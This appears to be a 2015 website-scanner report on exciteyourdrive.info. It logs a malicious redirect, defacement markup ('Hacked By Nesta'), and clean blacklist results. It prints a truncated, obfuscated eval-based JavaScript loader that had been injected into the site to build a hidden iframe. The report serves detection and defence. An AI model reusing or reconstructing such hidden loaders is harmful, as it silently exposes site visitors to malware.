Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://exciteyourdrive.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: exciteyourdrive.info Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 08 Sep 2015 01:55:20 GMT Location: http://costslaid.com/cgi-bin/r.cgi?p=10003&i=68d6570d&j=331&m=9e8a08de4649e2509dc031c6c8d5cfb0&h=exciteyourdrive.info&u=/&q=&t=20150907185520 Server: Apache Content-Length: 423 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: xccgtswgokoe=1; path=/; domain=exciteyourdrive.info; expires=Tue, 15-Sep-2015 01:55:20 GMT | malicious |
Scanned pages/files
Request | Server response | Status |
http://exciteyourdrive.info/ | 200 OK Content-Length: 12548 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["\x62o"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,68,64,6d,6b,6c,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,68,64,6d,6b,6c,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5f,69,25,66,65,5a,58,63,63,60,65,6 Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Nesta ...[8364 bytes skipped]... 2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1353!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script><!--/0c0896--> <p style="text-shadow: -28px 84.8px 28px black;" id="tsb-text">Hacked By Nesta</p> <p id="tsb-link"><a href="http://hacker-newbie.org/member.php?action=profile&uid=2038">Hacked By Nesta</a></p> <div id="tsb-wall"> <div id="tsb-ie"></div><br> <p></p> <center> <h1><blink>Indonesian Defacer</blink></h1><br> Gak tau mau dikasik notice apa, ane gak pinter buat kata-kata, tapi ane ganteng :P<br> < ...[3291 bytes skipped]... | ||
http://exciteyourdrive.info/test404page.js | 404 Not Found Content-Length: 422 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exciteyourdrive.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://exciteyourdrive.info/
Result: exciteyourdrive.info is not infected or malware details are not published yet.
Result: exciteyourdrive.info is not infected or malware details are not published yet.